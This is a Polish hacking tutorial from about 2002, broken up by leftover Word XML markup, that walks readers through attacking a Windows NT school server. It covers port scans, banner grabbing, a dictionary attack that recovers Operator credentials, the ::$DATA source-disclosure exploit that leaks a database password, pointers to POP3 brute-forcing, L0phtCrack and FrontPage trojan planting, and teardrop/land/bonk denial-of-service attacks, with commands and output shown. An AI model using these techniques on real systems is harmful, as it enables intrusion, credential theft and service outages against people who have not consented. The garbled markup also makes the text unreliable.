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**************************AZELI FAQ****** HACKING.CC **************************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tara wstawka - grzesiek@gryfnet.pl - Grekkk is known as azeli !!!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 PONOSZE ODPOWIEDZIALNOSCI ZA ZLE UZYCIE TEKSTOW ZAMIESZCZONYCH W TYM FAQ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JAK NIE CHCESZ TO NIE CZYTAJ - FAQ NAPISANE W CELACH EDUKACYJNYCH DLA MLODY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LUDZ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NIE CHCESZ TO NIE CZYTAJ ! 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__________________________________________________________________S__T__A__R__T_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stety musze zalozyc, ze chcecie pobawic sie z serwerem NT, ktory jest w sieci TCP/IP. Jesl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hcecie bez tego zalozenia to da sie zrobic. Bede komentowal niektore kroki, tak jakbysm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 byli w sieci.. . Testy przeprowadzamy na komputerze w sieci, wyposazonym w WindowsNT lub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Linux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hcialbym dodac, ze sprawdzalem te metody pod koniec roku 2001 wiec duzo sie zmienilo, z uwagi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 to ze moja siec szkolna jest stara jak swiat. Opisalem tu technike ale nie zalozylem alternatyw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niewaz ostatnimi laty wole linuxa niz bawic sie w Windzie. Jednak na sflustrowanych nauczycieli</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykytekst"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho;ＭＳ 明朝"/>
        </w:rPr>
        <w:t>informatyki, ktorzy sami probuja rozkminic sieci komputerowe, korzystajac ze starych podrecznikow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z lat studiow jest to z pewnoscia jedna z lepszych metod dobicia ich :&gt; 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k wstep mamy juz za soba.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I. Pobaw sie z WindowsNT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Co i jak z serwerem w sieci?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Nasłuch sieciow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Skanowanie portow serwa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Identyfikacja systemu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Penetracja systemu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. Symulacja wlamania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. Ataki typu "odmowa uslugi" DoS  (Denial of Service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MS Mincho;ＭＳ 明朝"/>
        </w:rPr>
        <w:t>________________________________________________________________________________________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I Pobaw sie Windows NT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1. Co i jak z serwerem w sieci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Nie możemy załozyc, ze znamy nazwe serwera i jego IP. Poniewaz zalozeniem tego faq jest opisywanie od </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykytekst"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho;ＭＳ 明朝"/>
        </w:rPr>
        <w:t>podstaw kolejno co mozna zrobic - a przede wszystkim ukazac zaleznosci miedzy stosowaniem jednych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rogramow w konfrontacji z drugimi - sprobujcie wykonac nastepujace dzialania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1) Aby nie meczyc sie jakimis programami do wykrywania kompow w sieci na poczatek - sprawdzmy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jczesciej spotykane formy zapisu wewnetrznych adresow IP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 oknie uruchom (Start/Uruchom) wpisz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ping -t 10.10.10.1 - jesli uplynie limit czasu zadania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ing -t 10.10.10.2 - i jesli znow "nie trafiles"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ing -t 10.0.0.1 - i jesli nadal nic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ing -t 10.0.0.2 - jesli po 4-probach nie udalo ci sie dojsc piechota do adresu IP serwera proponuje uzyc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jakiegos skanera sieciowego, ktory wykrywa komputery w sieci. Odbywa sie to raczej na zasadzie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dkrywania wszystkich adresow IP. Jako szczegol flaga -t powoduje iz okno pingu nie zostaje zamkniet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po wyslaniu 4 standardowych pakietow tylko pingowanie prowadzone jest dalej, do czasu recznego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ylaczenia. A wiec uzyj np. Hacktek jedno z plagowych urzadzen do wykrywania IP. Oczywiscie mozesz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pytac sie tez Pani od informatyki w pracowni ale nie wiem czy ci powie :) - dyskretniej spytaj sie o nazw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erwera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Jesli masz nazwe serwera(tower) mozesz tak jak wyzej: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ng -t tower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winno wyswietlic sie mniej wiecej cos takiego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@ C:\Windows\ping tower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inging tower [10.10.10.1] with 32 bytes of data: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y from 10.10.10.1: bytes=32  time=1ms  TTL=128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Reply from 10.10.10.1: bytes=32  time=1ms  TTL=128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^C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Wniosek: Serwer Tower posiada sieciowy numer IP - 10.10.10.1 i jest dostepny w sieci TCP/IP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2. Nasluch sieciow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Wiec tak. Nasluch sieciowy jest bardzo istotna rzecza, tutaj dowiemy sie, jaki system opewacyjny dokladnie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obsluguje serwer oraz w jaki sposob rozporzadza on siecia. Przy odrobinie szczescia dowiemy sie w jaki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posob zbudowana jest siec i co mozemy wykombinowac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sluch sieciowy mozna prowadzic roznymi programami. Ja proponuje Network Monitor - dostepny w pakieci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anagement Server 1.2 w systemie WindowsNT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Jesli admin nie byl glupowaty i jesli siec budowali "fachowcy" to pewnie podczas prowadzenia nasluchu pojawi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ie nam cos takiego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rc ...         | Dst Mac Addr   | Protocol | Description    |  Src Other    | Dst Other |  Type Other | .. |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TOWER      | *BROADCAST  | NBT       | NS: Query r. | TOWER       | FINANSE  | IP               |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TOWER      | *BROADCAST  | NBT       | NS: Query r. | TOWER       | FINANSE  | IP               |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TOWER      | *BROADCAST  | NBT       | NS: Query r. | TOWER       | FINANSE  | IP               |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stety, siec ta siec ta zbudowana jest na bazie swichow (inteligentnych przelacznikow) cos jak huby dl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iewtajemniczonych. Pakiety typu BROADCAST powiadamiaja nas o tym, ze jest to serwer WINDOWS NT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3. Skanowanie portow serw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kanowanie portow nie moze odbywac sie bez slynnego NMAPA, jest to najlepszy jaki znam linuxowy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skaner portow. Radze go uzyc - w przyszlosci moze okazac sie nie zastapiony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Mozemy go znalesc pod adresem: http://www.dhp.com/~fyodor/nmap/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Napisze moze jak zainstalowac i uruchomic, jesli ktos jest poczatkujacy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ciagamy zrodla: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wget http:// ... (do pliku) a jesli sie nie da (#wget) to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ynx http:// ... ( tez do pliku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zakladam ze plik zrodlowy nazywa sie: nmap-001.tar.gz - to wtedy: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ar -zxf nmap-001.tar.gz (dalej)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cd nmap-00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./configure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make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make install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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  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Uruchamiamy nmapa komenda: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./nmap -s tower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lub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./nmap -s 10.10.10.1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Zastosowalismy typ skanowania polotwartego aby utrudnic wykrycie skanera. Nalezy chwile zaczekac,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az nmap odwali za nas prace i powinna sie wyswietlic lista otwartych portow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Jesli chcemy miec ja do potrzeb dlugoterminowych mozemy przekierowac to do pliku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Uruchomimy wtedy skaner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./nmap -s 10.10.10.1 &gt;&gt; skanowanie (a nastepnie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at skanowani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albo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./nmap -s Tower &gt;&gt; skanowanie (a nastepnie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at skanowanie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Gdy ja skanowalem serwer zostaly zauwazone nastepujace otwarte porty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pen ports on Tower (10.10.10.1) :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Port Numer        Protocol        Service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25                     tcp                smtp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53                     tcp                domain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80                     tcp                http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110                   tcp                pop-3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..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Moze ich byc o wiele wiecej, hehe im wiecej tym lepiej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Wniosek: Na podstawie skanera portow NMAP uzyskalismy informacje o nastepujacych otwartych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portach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erwer poczty elektronicznej SMTP (port 25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erwer nazw domenowych DNS  (port 53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erwer informacyjny WWW (port 80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- serwer skrzynek pocztowych POP3 (port 110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4. Identyfikacja systemu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a) Dokonaliśmy proby identyfikacji rodzaju i wersji serwera poczty elektronicznej SMTP, serwera WWW, oraz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erwera POP3 za pomoca programu NetCat (mozna zrobic to takze za pomoca telnet ale NetCat ma duzo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ecej mozliwosci i warto zapoznac sie z tym programem). Chciałem dodac, ze do identyfikacji serwerów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WW mozna urzyc takze programu HttpVer (http://www.rootshell.com)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- dawniej NetCat udostepniany byl pod super ftp: ftp://ftp.technotronic.com.pl  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ale teraz mozna go znalesc w Google (www.google.com) wpisujac NetCat,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am tak sciagnolem :-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Oto log jak to zrobic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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D:\NETCAT&gt;nc 10.10.10.1 2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220 tower.stronghold Microsoft Exchange Internet Mail Service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5.0.1457.7 ready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:\NETCAT&gt;nc -v 10.10.10.1 8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10.10.10.1:  inverse host lookup failed: h_errno 11004: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NO_DATA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TOWER [10.10.10.1] 80 (?) open:  unknown socket error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get / http/1.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HTTP/1.0 401 Access Denied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WW-Authenticate: NTLM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ntent-Lenght: 24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Content-Type: text/html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Error: Access Denied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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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D:\NETCAT&gt;nc 10.10.10.1 11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+OK Microsoft Exchange POP3 server version 5.0.1457.10 ready</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykyteks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Wnioski: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>Rozpoznano serwer poczty elektronicznej Microsoft Exchange Mail Server w wersji 5.0.1457.10.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</w:rPr>
        <w:t>Identyfikacja serwera WWW nie powiodla sie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b) Do dalszych testow nad wersjami i identyfikacja wstepna moze posłuzyc nam program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RedButton. Za pomoca niego mozna ustalic listy zasobow dyskowych serwera Tower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udostepnianych w sieci WindowsNT. Prawdopodobnie, jesli owy katalog znajdziemy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to nie uda sie nam uzyskac don dostepu bez hasla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c) Przeprowadzimy takze kontrole poprawnosci konfiguracji serwisu wspoldzielenia plikow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ang. (file sharing system service) serwera Tower za pomoca programu NAT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(NetBios Security Kit v1.0) (free$$) W trakcie dzialania wykonujemy atak slownikowy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 uzyciem przygotowanego wczesniej pliku passlist.txt oraz pliku userlist.txt . Jak powszechnie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iadomo plik passlist.txt zawiera zespoly potencjalnych hasel, zostal on wygenerowany przez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slownik - pierwszy lepszy darmowy, specjalnie dla WindowsNT poniewaz zasady "loginow" i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ajczesciej uzywanych hasel standardowych sa nieco inne niz w Unixach. Piszac - specjalnie dla NT -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moze to byc dowolny slownik, ale wtedy sobie troche poczekamy, a czas jest dla nas niezwykle cenny.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FaQ to opiera sie dlatego bardziej na sprawdzaniu ewentualnych luk w funkcjonowaniu sieci i serwera niz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na shaczeniu calej piaskowicy. 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Oto przyklad takiego dzialania. Poszlo nam tu niezwykle latwo ale o tym za chwile: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D:\NAT\nat -u userlist.txt -p passlist.txt 10.10.10.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[*] --- Reading usernames from userlist.txt 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[*] --- Reading passwords from passlist.txt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[*] --- Checking host: 10.10.10.1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[*] --- Obtaining list of remote NetBIOS names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(...)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[*] --- Attempting to connect with Username: 'Administrator'    Password: 'Administrator'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(...)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[*] --- Attempting to connect with Username: 'Operator'    Password: 'Operator'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[*] --- Connected: Username: 'Operator'    Password: 'Operator' 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</w:rPr>
        <w:t>(...)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Wniosek: widzimy iz polaczylismy sie jako Operator z passem Operator, jest male prawdopodobienstwo ze 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 jakims serwerze bedzie tak prosto uzyskac haslo dostepu, tutaj celowo je zmienilem aby pokazac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dzialanie programu. Co wiecej uzytkownik Operator w systemie WindowsNT ma o wiele wieksze uprawnienia co zwykly user nawet podniesiony </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykyteks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o wyzszego poziomu (c czy d) Logowanie na Operator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wykorzystuje sie w celu sprawdzenia jakiejs uslugi na komputerze 'user'. Logowanie sie na administratora</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykytekst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wnosi na np. szkolnych komputerach za wiele ryzyka :-). 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 xml:space="preserve">d) Jesli wczesniej zrobilismy przeszukiwanie wspoldzielonych katalogow to teraz, majac haslo operatora mozemy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zobaczyc co w trawie piszczy. Na moim przykladzie okazalo sie ze uzytkownik Operator ma dostep do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spoldzielonego katalogu 'HTTP' na serwerze TOWER, jednak nie moze odczytywac zadnych katalogow nizszego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rzedu, gdzie prawdopodobnie znajduja sie strony serwera WWW. Penetracja zawartosci pliku "default.asp" (w tym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katalogu) z rozszerzeniem pliku .asp oraz odwolan znajdujacych sie w pliku pozwolila nam wywnioskowac iz w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ystemie wykorzystywana jest technologia ASP (Active Server Pages). ASP funkcjonuje z reguły na bazie serwera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Microsoft Internet Information Server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e) Po zalogowaniu sie do domeny NT jako uzytkownik Operator (wykorzystujac ustalone wczesniej haslo ptp. c). dokonano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rzegladu zawartosci dostepnych stron serwera WWW. Poprzez wywolanie strony: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http://tower/_vti_inf.html  - sprawdzono czy na serwerze TOWER zainstalowano oprogramowanie Microsoft Frontpage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znane z duzej ilosci bledow. (Nie wiem jak z ver. frontapage 2000 ale z tym wczesniejszym 2.0 mi sie udalo :) )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Wniosek: W trakcie przegladania stron www, a takze zrodel serwera TOWER zauwazylismy odwolanie do adresu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-mail administratora serwera NT.:  admin@firma.pl Co zdalej? O tym za chwile.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5) Penetracja systemu WindowsNT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Aby cos sie udalo potrzebujemy kilka exploitow do WindowsNT, nie bedzie to stanowic wiekszego problemu, co to jest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exploit powinienes wiedziec, jesli nie to poszukaj w innych faq bo jest o tym pelno. Jesli wiesz co to a nie wiesz skad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sciagnac proponuje wysmienite strony.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http://www.rootshell.com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http://www.dhp.com/~fyodor/sploits_microshit.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykyteks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- http://insecure.org/sploits_micoshit.html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Jest tam takze mnostwo informacji o zabezpieczeniach w systemie NT radze poczytac, bo to co napisalem to nie wiele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 porownaniu z tym co moze nas spotkac, nie kazdy serwer jest tak samo skonfigurowany wiec najwazniejsze jest aby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zo czytac i czytac a przede wszystkim radze nauczyc sie angielskiego.. i to dobrze.. .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Zwykyteks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) Podam kilka przykladow, oto pierwszy z nich. Sprobujemy wykorzystac bledy w technologii Active Server Pages (ASP).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Dokonujemy odczytu kodu zrodlowego strony ASP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Adresy URL przegladanych stron rozszerzymy takze o fraze '::$DATA'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p. http://tower/.../strona.asp::$DATA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Umozliwilo to zaladowanie do przegladarki WWW skryptow Visual Basic, poprzez ktore serwer WWW komunikuje sie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z serwerem bazy danych (podczas normalnej pracy skrypty te oczywiscie nie moga byc odczytywane przez uzytkownikow)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Dokonano odczytu kodu zrodlowego poufnych plikow konfiguracyjnych ASP 'global.asa'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np. http://Tower/Stronghold/global.asa::$DATA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Powinny sie tam zlalesc frazy zaczynajace sie od slowa Session(), umieszczone na poczatku kodu zrodlowego. U mnie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yglada to mniej wiecej tak ;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US"/>
        </w:rPr>
        <w:t>...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ession("Stronghold_ConnectionString")       =   DATABASE=fin_sql ; "DSN= ...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ession("Stronghold_ConnectionTimeout")    =   15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ession("Stronghold_CommandTimeout")      =   30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Session("Stronghold_RuntimeUserName")     =   "Wlk"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykytekst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 xml:space="preserve">Session("Stronghold_RuntimePassword")      =   "astronomia" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykytekst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..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Uwaga. Niestety to dziala tylko w Service Pack 3 i mniej bo SP 4 juz eliminuje ten blad :-( Sa tez do tego latki na stronie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microsoftu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Wnioski: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Z owych linijek wynika ze serwer WWW korzysta z bazy danych o nazwie "fin_sql". Dostep do konta administratora bazy danych "Wlk"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jest chroniony haslem "astronomia". W oparciu o te dane mozna dokonac odczytu lub modyfikacji zawartosci zasobow informacyjnych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serwera TOWER (np. poprzez interfejs ODBC za pomoca programu MsAccess)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) Mozna pokusic sie na przyklad na inne rzeczy, jednak one wymagaja czasu w dzialaniu i cierpliwosci.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przeprowadzic atak slownikowy lub atak brutalny na skrzynke pocztowa POP3 administratora (tzn. admin@firma.pl ) np. za pomoca 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ogramu pop3.c dostepnego w internecie pod adresem: http://www.rootshell.com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- przeprowadzic atak slownikowy lub atak brutalny na hasla uzytkownikow serwera TOWER za pomoca programu L0pht Crack, dostepnego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w internecie pod adresem:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykyteks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http://www.l0pht.com/l0phtcrack/ (zakladajac, ze po zalogowaniu sie jako Operator zdolamy odczytac zaszyfrowane hasla z rejestru systemu)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-  ewentualnie uruchomic na serwerze aplikacje typu "kon trojanski" na serwerze TOWER wykorzystujac bledy oprogramowania Microsoft </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykytekst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Frontpage 2.0 - wiecej informacji na http://www.dhp.com/~fyodor/sploits/Microsoft.frontpage.insecurites.html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Badanie odpornosci systemu na ataki typu odmowa uslugi (DoS)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Zwykyteks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Za pomoca exploitow przeprowadzamy nastepujace ataki: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- teardrop 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ysylanie pakietow poddanych fragmentacji w taki sposob, aby w trakcie ich kompletowania poszczegolne datagramy skladowe zachodzily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 siebie. (tzn. pole dolaczonego datagramu IP pokrywa sie z czescia poprzednio odebranego datagramu.) Prosciej nie mozna.. :\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- newtear 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zmodyfikowana wersja ataku teardrop, ta sama koncepcja ataku, jednak jest to odpowiedz na latki wydane na systemy operacyjne na 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przedni typ ataku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land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ysylamy do atakowanego komputera w sieci - pakietow SYN (inicjuja one polaczenie TCP), w ktorych port i adres zrodlowy oraz port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adres docelowy wskazuja na ten sam serwer (tzn. atakowany komputer), co w konsekwencji powoduje, ze serwer probuje nawiazac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laczenie sieciowe z samym soba.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- bonk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dobnie do teardrop, rowniez wysylamy pakiety podlegajace fragmentacji, jednak w taki sposob aby nie pokrywaly sie w calosci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zczegolne datagramy podczas kompletowania oryginalnych pakietow. Znany takze pod nazwa : reversed teardrop.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niosek: Na wszystkie cztery ataki serwer TOWER okazal sie wrazliwy, stal sie niedostepny w sieci i wykazywal prawie 100% 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bciazenie. Po dokonaniu restartu komputera (normalne wylaczenie nie bylo mozliwe) serwer powrocil do normalnego stanu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acy. Atak 'bonk' doprowadzil do upadku systemu (ekran przyjal jasnoniebieski odcien). Po dokonaniu restartu serwer wykazywal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykyteks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blemy z obsluga pamieci wirtualnej.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W tej wersji Faq to wszystko . Mam nadzieje ze za bardzo nie namieszalem Jakby co to na maila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zesiek@gryfnet.pl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Greetz:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykyteks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ankan, michu, yahoo :&gt; (Daj mi to IP!!) , Tomaderon, Vitaminka, Deisiak, Alexa, lOOcas, kUk, _cam_, ProXer, Czerny, Nesquik, BigBullek, Arturino, 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x-men, p4wl, michu_web, student56, Katja16, Dreed, Mauy, Gapiatko, x-men, GaLa, grzes18:), Mosdef, pazzio, MadCow, Brabus, Jeremee, Buddha, and otherZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykyteks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#bukowe, #linux.pl , #cesarstwo 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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Zwykyteks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9:17:00Z</dcterms:created>
  <dc:creator>Kamil Kozyra</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Kamil Kozyra</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2002-06-26T19:18:00Z</dcterms:modified>
  <cp:revision>6</cp:revision>
  <dc:subject/>
  <dc:title>**************************AZELI FAQ****** HACKING</dc:title>
</cp:coreProperties>
</file>